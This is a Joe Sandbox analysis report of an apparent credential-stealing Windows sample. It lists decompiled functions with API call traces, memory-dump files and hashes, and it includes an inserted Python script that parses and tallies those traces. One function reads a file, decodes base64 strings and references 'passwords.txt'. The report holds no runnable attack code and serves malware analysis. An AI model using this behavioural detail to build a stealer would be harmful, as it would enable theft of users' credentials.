                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3b43bf645c95f891ee968bd8604ac2e5917f5d34a4099c9dae524777e7e51350
                                                                                                                                                                                                                                                          • Instruction ID: 2452cfbbd8bf818e8d2d44bf2afebc1780ece1cf3309f14ea954b37b55da2a06
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b43bf645c95f891ee968bd8604ac2e5917f5d34a4099c9dae524777e7e51350
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A217DB5D0020E8FCB14CFA9C4816EEFBF4BB48220F54846ACA56B3350E634AA448F90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
• Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
• Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
• Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
APIs
  • Part of subcall function 00FEDD33: lstrlenA.KERNEL32(?,76885460,?,00000000), ref: 00FEDD6F
  • Part of subcall function 00FEDD33: strchr.MSVCRT ref: 00FEDD81
• GetProcessHeap.KERNEL32(00000008,?,76885460,?,00000000), ref: 00FEDEB8
• HeapAlloc.KERNEL32(00000000), ref: 00FEDEBF
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDED4
• HeapFree.KERNEL32(00000000), ref: 00FEDEDB
• strcpy_s.MSVCRT ref: 00FEDEF7
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDF09
• HeapFree.KERNEL32(00000000), ref: 00FEDF16
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FEDF47
• HeapFree.KERNEL32(00000000), ref: 00FEDF4E
• GetProcessHeap.KERNEL32(00000008,?), ref: 00FEDF55
• HeapAlloc.KERNEL32(00000000), ref: 00FEDF5C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDF71
• HeapFree.KERNEL32(00000000), ref: 00FEDF78
• strcpy_s.MSVCRT ref: 00FEDF8E
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDFA0
• HeapFree.KERNEL32(00000000), ref: 00FEDFA7
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FEDFC5
• HeapFree.KERNEL32(00000000), ref: 00FEDFCC
• GetProcessHeap.KERNEL32(00000008,?), ref: 00FEDFD3
• HeapAlloc.KERNEL32(00000000), ref: 00FEDFDA
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDFEF
• HeapFree.KERNEL32(00000000), ref: 00FEDFF6
• strcpy_s.MSVCRT ref: 00FEE006
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE018
• HeapFree.KERNEL32(00000000), ref: 00FEE01F
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FEE047
• HeapFree.KERNEL32(00000000), ref: 00FEE04E
• GetProcessHeap.KERNEL32(00000008,?), ref: 00FEE055
• HeapAlloc.KERNEL32(00000000), ref: 00FEE05C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE077
• HeapFree.KERNEL32(00000000), ref: 00FEE07E
• strcpy_s.MSVCRT ref: 00FEE091
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE0A3
• HeapFree.KERNEL32(00000000), ref: 00FEE0AA
• lstrlenA.KERNEL32(00000000), ref: 00FEE0B3
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FEE0C9
• HeapAlloc.KERNEL32(00000000), ref: 00FEE0D0
• lstrlenA.KERNEL32(00000000), ref: 00FEE0E8
  • Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
• strcpy_s.MSVCRT ref: 00FEE129
• GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 00FEE14F
• HeapFree.KERNEL32(00000000), ref: 00FEE15C
• lstrlenA.KERNEL32(?), ref: 00FEE161
• GetProcessHeap.KERNEL32(00000008,00000001), ref: 00FEE170
• HeapAlloc.KERNEL32(00000000), ref: 00FEE177
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE18B
• HeapFree.KERNEL32(00000000), ref: 00FEE192
• strcpy_s.MSVCRT ref: 00FEE1A0
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE1AD
• HeapFree.KERNEL32(00000000), ref: 00FEE1B4
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE1E9
• HeapFree.KERNEL32(00000000), ref: 00FEE1F0
• GetProcessHeap.KERNEL32(00000008,?), ref: 00FEE1F7
• HeapAlloc.KERNEL32(00000000), ref: 00FEE1FE
• strcpy_s.MSVCRT ref: 00FEE219
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE22B
• HeapFree.KERNEL32(00000000), ref: 00FEE232
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE2D6
• HeapFree.KERNEL32(00000000), ref: 00FEE2DD
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE327
• HeapFree.KERNEL32(00000000), ref: 00FEE32E
  • Part of subcall function 00FEDD33: strchr.MSVCRT ref: 00FEDDA6
  • Part of subcall function 00FEDD33: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDC8
  • Part of subcall function 00FEDD33: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEDDD5
  • Part of subcall function 00FEDD33: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDDC
  • Part of subcall function 00FEDD33: strcpy_s.MSVCRT ref: 00FEDE23
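The API list above is the per-function trace format this report repeats for every analysed function: a bullet, an optional "Part of subcall function <addr>:" prefix, then `API.MODULE(stack words), ref: <addr>`, with `?` where the sandbox could not resolve a stack value. The Python script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses lines in exactly that format, separates the function's own calls from those attributed to subcalls, and reports per-API counts, the address range covered, and the HeapAlloc/HeapFree balance. Counted on the full listing above, the body contains 7 HeapAlloc calls against 18 HeapFree calls, with one further HeapAlloc inside the subcall at 00FEDD33, which is consistent with the caller freeing buffers that the subcall returns; the script surfaces that asymmetry without hand-counting. The embedded sample trace is a constructed subset of the lines above, and the class and function names are the example's own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a subset of the API lines from the function listing above,
# copied in the format the report uses (one subcall HeapAlloc line included on purpose).
SAMPLE_TRACE = """\
• Part of subcall function 00FEDD33: lstrlenA.KERNEL32(?,76885460,?,00000000), ref: 00FEDD6F
• Part of subcall function 00FEDD33: strchr.MSVCRT ref: 00FEDD81
• GetProcessHeap.KERNEL32(00000008,?,76885460,?,00000000), ref: 00FEDEB8
• HeapAlloc.KERNEL32(00000000), ref: 00FEDEBF
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDED4
• HeapFree.KERNEL32(00000000), ref: 00FEDEDB
• strcpy_s.MSVCRT ref: 00FEDEF7
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDF09
• HeapFree.KERNEL32(00000000), ref: 00FEDF16
• lstrlenA.KERNEL32(00000000), ref: 00FEE0B3
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FEE0C9
• HeapAlloc.KERNEL32(00000000), ref: 00FEE0D0
• Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
• Part of subcall function 00FEDD33: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDDC
"""

# One trace line: optional subcall prefix, API name (may contain "::"), module,
# optional parenthesised stack words, then "ref: <hex address>".
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[\w:]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: tuple            # stack words as recorded; "?" means unresolved
    ref: int               # address of the call site
    subcall: Optional[int]  # callee address when attributed to a subcall, else None


def parse_api_trace(text: str) -> list:
    """Parse report-style API lines into ApiCall records; reject anything off-format."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised trace line: {line!r}")
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        calls.append(ApiCall(
            func=m["func"], module=m["mod"], args=args,
            ref=int(m["ref"], 16),
            subcall=int(m["sub"], 16) if m["sub"] else None))
    return calls


def heap_balance(calls, include_subcalls: bool = False) -> tuple:
    """(HeapAlloc count, HeapFree count), for the body only or including subcall lines."""
    allocs = frees = 0
    for c in calls:
        if c.subcall is not None and not include_subcalls:
            continue
        if c.func == "HeapAlloc":
            allocs += 1
        elif c.func == "HeapFree":
            frees += 1
    return allocs, frees


def summarize(calls) -> dict:
    """Per-(API, module) counts of the body's own calls, their address span, and the subcallees."""
    direct = [c for c in calls if c.subcall is None]
    return {
        "counts": Counter((c.func, c.module) for c in direct),
        "range": (min(c.ref for c in direct), max(c.ref for c in direct)) if direct else None,
        "subcallees": sorted({c.subcall for c in calls if c.subcall is not None}),
    }


if __name__ == "__main__":
    calls = parse_api_trace(SAMPLE_TRACE)
    s = summarize(calls)
    lo, hi = s["range"]
    print(f"body calls: {sum(s['counts'].values())}, call sites {lo:08X}-{hi:08X}")
    for (func, mod), n in s["counts"].most_common():
        print(f"  {n:3d}  {func}.{mod}")
    a, f = heap_balance(calls)
    a2, f2 = heap_balance(calls, include_subcalls=True)
    print(f"HeapAlloc={a} HeapFree={f} in the body; HeapAlloc={a2} HeapFree={f2} with subcall lines")
    print("subcallees:", ", ".join(f"{x:08X}" for x in s["subcallees"]))
```

To run it over a real function entry, paste the bullet lines between "APIs" and "Memory Dump Source" into `SAMPLE_TRACE` (or read them from a file); the parser raises on any line it does not recognise rather than silently skipping it, so a changed report layout is noticed immediately.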
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
• String ID:
• API String ID: 838878465-0
• Opcode ID: 7738935f6c9b8d0d9e55e8ceba94fd16851ddbf8d2fe70c04c858815b6808a15
• Instruction ID: 0a6e92e228025c74c55a4f19aa67d50fc9c90aab57ee2b32094aec1fe218306d
• Opcode Fuzzy Hash: 7738935f6c9b8d0d9e55e8ceba94fd16851ddbf8d2fe70c04c858815b6808a15
• Instruction Fuzzy Hash: 83E12872C0425AAFDF319FF1EC88A9DBFB9BF48310F24446AE215A3116CB765584AF50
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,010163D8,01015816), ref: 00FEAAFA
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB12
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB1A
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB26
• ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB30
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB42
• GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB4E
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB55
• StrStrA.SHLWAPI(00FEB95E,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB66
• StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB80
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB93
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB9D
• lstrcatA.KERNEL32(00000000,010163DC,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABA9
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABB3
• lstrcatA.KERNEL32(00000000,010163E0,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABBF
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABCC
• lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABD4
• lstrcatA.KERNEL32(00000000,010163E4,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABE0
• StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABF0
• StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC00
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC13
  • Part of subcall function 00FEA911: _memset.LIBCMT ref: 00FEA94E
  • Part of subcall function 00FEA911: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEA969
  • Part of subcall function 00FEA911: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FEA971
  • Part of subcall function 00FEA911: _memmove.LIBCMT ref: 00FEA9F4
• lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC22
• lstrcatA.KERNEL32(00000000,010163E8,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC2E
• StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC3E
• StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC4E
• lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC61
  • Part of subcall function 00FEA911: lstrcatA.KERNEL32(0101580E,01015812,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA1E
  • Part of subcall function 00FEA911: lstrcatA.KERNEL32(0101580E,01015813,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA34
• lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC70
• lstrcatA.KERNEL32(00000000,010163EC,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC7C
• lstrcatA.KERNEL32(00000000,010163F0,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC88
• StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC98
• lstrlenA.KERNEL32(00000000), ref: 00FEACB6
• CloseHandle.KERNEL32(?), ref: 00FEACE5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocBinaryCloseCreateCryptHandleProcessReadSizeString_memmove_memset
                                                                                                                                                                                                                                                          • String ID: passwords.txt
                                                                                                                                                                                                                                                          • API String ID: 1221571796-347816968
                                                                                                                                                                                                                                                          • Opcode ID: 498754e0584a41d8368ccb035dc460eafadafb8fd4975662656f6cd2aa3164f2
                                                                                                                                                                                                                                                          • Instruction ID: 7a637e0ec74a1e8c76659d5a995aee7843bc27b34cd615a4d08e2fe79418bf46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 498754e0584a41d8368ccb035dc460eafadafb8fd4975662656f6cd2aa3164f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC71913250015AAFCB217FB5FD4DCAF7B79EF59301B018014FB01A216ADBBA5901DBA1
APIs
• WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CD50650
• LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CD50664
• GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CD50696
• GetProcAddress.KERNEL32(SymSetOptions), ref: 6CD506C5
• GetProcAddress.KERNEL32(SymInitializeW), ref: 6CD506F5
• GetCurrentProcess.KERNEL32 ref: 6CD50714
• GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6CD50798
• GetCurrentProcess.KERNEL32 ref: 6CD507AD
• lstrlenW.KERNEL32(00000002), ref: 6CD507C2
• GetCurrentProcessId.KERNEL32 ref: 6CD507F0
• CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6CD5086C
• CloseHandle.KERNEL32(00000000), ref: 6CD5088B
• GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6CD50939
• GetCurrentProcess.KERNEL32 ref: 6CD5094E
• GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6CD509AD
• GetCurrentProcess.KERNEL32 ref: 6CD509BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: AddressProc$CurrentProcess$CloseCreateHandleLibraryLoadMutexObjectSingleWaitlstrlen
• String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
• API String ID: 1912552845-356128008
• Opcode ID: ca52cd8e5aeae1186085072b9ffcb16e0b9f5cd1c34c5fb6361b4d379bff246c
• Instruction ID: cd2090854a92e4ae53a2b5a2bd5db9f1669bdca3f0e45e35b991e1c5eb57a374
• Opcode Fuzzy Hash: ca52cd8e5aeae1186085072b9ffcb16e0b9f5cd1c34c5fb6361b4d379bff246c
• Instruction Fuzzy Hash: B4C1D5B1E01298DBFF11CFB5C844BAE7BB8AB45798F144219E514BB790D7709804CFA0
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 010045BF
• __mtterm.LIBCMT ref: 010045CB
  • Part of subcall function 0100428A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0100429B
  • Part of subcall function 0100428A: TlsFree.KERNEL32(FFFFFFFF), ref: 010042B5
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 010045E1
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 010045EE
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 010045FB
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01004608
• TlsAlloc.KERNEL32 ref: 01004658
• TlsSetValue.KERNEL32(00000000), ref: 01004673
• __init_pointers.LIBCMT ref: 0100467D
• EncodePointer.KERNEL32 ref: 0100468E
• EncodePointer.KERNEL32 ref: 0100469B
• EncodePointer.KERNEL32 ref: 010046A8
• EncodePointer.KERNEL32 ref: 010046B5
• DecodePointer.KERNEL32(Function_0002440E), ref: 010046D6
• __calloc_crt.LIBCMT ref: 010046EB
• DecodePointer.KERNEL32(00000000), ref: 01004705
• __initptd.LIBCMT ref: 01004710
• GetCurrentThreadId.KERNEL32 ref: 01004717
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• API String ID: 3732613303-3819984048
• Opcode ID: 58ec33fdfe7f33255ce4c58e93a501a751999ca52e8e22519b3d099cf9acb4ce
• Instruction ID: f952325d3fa6103092665a52f113f6ca67c5f8d0be120b1a7203887f1db8fa1e
• Opcode Fuzzy Hash: 58ec33fdfe7f33255ce4c58e93a501a751999ca52e8e22519b3d099cf9acb4ce
• Instruction Fuzzy Hash: 12317F709013519FEB72AF79A9089063FE4BB4D261F01462BE6C4D7298EB7E8001DF49
APIs
